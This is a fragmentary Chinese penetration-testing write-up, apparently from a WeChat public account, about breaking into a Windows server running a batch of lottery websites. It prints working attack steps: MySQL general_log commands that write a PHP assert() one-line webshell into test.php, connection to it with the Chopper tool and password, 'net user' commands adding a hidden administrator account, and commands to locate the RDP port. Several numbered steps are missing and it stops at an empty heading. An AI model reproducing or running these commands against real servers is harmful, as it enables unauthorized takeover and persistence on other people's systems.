声明：请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者及本公众号无关！

命令如下:

1、开启日志功能：set global general_log=on;

这里的日志文件是test.php。

3、执行SQL命令写入一句话到日志文件: 

SELECT'<?php assert($_POST["test"]);?>';

5、 查看日志文件。

使用菜刀连接日志文件木马，xxx/test.php 密码:test

查看发现是系统管理员sysytem权限，直接添加用户且添加到管理组即可。 

命令为: 

C:\Windows\system32\net.exe user Test [email protected]#123 /addC:\Windows\system32\net.exe  localgroup administrators Test /add

1、直接telnet ip 3389 测试发现可通，于是直接连接3389进去。

2、或者这里在菜刀上执行以下命令查询3389开放的端口也一样。

第一步: tasklist /svc | findstr TermService 查询远程桌面服务的进程

第二步: netstat -ano | findstr ****  //查看远程桌面服务进程号对应的端口号。

5、发现该服务器使用phpmystudy批量建立彩票站，大概有十几个站点，随意访问几个服务器上的网站域名，部分截图如下:

系统一:

版权申明：内容来源网络，版权归原创者所有。除非无法确认，都会标明作者及出处，如有侵权烦请告知，我们会立即删除并表示歉意。祝愿每一位读者生活愉快！谢谢!